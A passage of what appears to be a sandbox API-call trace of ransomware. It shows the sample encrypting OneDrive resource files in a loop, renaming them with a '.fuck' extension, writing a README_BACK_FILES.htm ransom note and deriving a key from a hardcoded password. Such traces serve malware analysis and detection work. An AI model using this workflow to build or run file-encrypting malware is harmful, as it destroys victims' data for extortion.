ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.179] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.179] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.179] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.179] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.179] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.179] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.179] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.179] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.179] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.179] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.179] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.179] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.180] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.180] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.180] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.180] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.180] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.180] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.180] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.180] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.180] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.180] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.180] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.180] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.180] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.180] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.180] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.180] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.180] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.181] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.181] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.181] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.181] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.181] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.181] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.181] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.181] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.181] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.181] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.181] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.181] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.181] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.181] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.181] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.181] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.181] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.181] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.182] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.182] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.182] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.182] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.182] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.182] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.182] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.182] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.182] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.182] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.182] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.182] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.182] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.182] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.182] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.182] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.182] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.182] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.183] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.183] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.183] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.183] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x148, lpOverlapped=0x0) returned 1 [0283.183] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x148, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x150) returned 1 [0283.183] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x150, lpOverlapped=0x0) returned 1 [0283.183] CloseHandle (hObject=0x5d3c) returned 1 [0283.183] CloseHandle (hObject=0x5d4c) returned 1 [0283.183] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\or-in\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\or-in\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0283.188] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0283.189] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\or-in\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0283.191] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\or-in\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\or-in\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0283.192] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0283.192] CryptDestroyKey (hKey=0x2fc808) returned 1 [0283.192] CryptReleaseContext (hProv=0x2f1f768, dwFlags=0x0) returned 1 [0283.193] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0283.193] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0283.193] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\or-in\\readme_back_files.htm")) returned 0xffffffff [0283.193] AreFileApisANSI () returned 1 [0283.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e28c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0283.193] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\or-in\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d80 [0283.194] GetFileType (hFile=0x5d80) returned 0x1 [0283.194] WriteFile (in: hFile=0x5d80, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0283.195] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0283.195] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0283.195] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0283.195] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0283.195] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0283.195] GetLastError () returned 0x0 [0283.195] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa\\filesync.localizedresources.dll.mui")) returned 0x20 [0283.196] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0283.196] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0283.197] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0283.198] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0283.198] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1fdc8) returned 1 [0283.200] CryptCreateHash (in: hProv=0x2f1fdc8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0283.200] lstrlenA (lpString="DbEzeqAXcZyIDeePOCTADQaQzMlQm") returned 29 [0283.200] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0283.200] CryptDeriveKey (in: hProv=0x2f1fdc8, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc6c8) returned 1 [0283.200] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 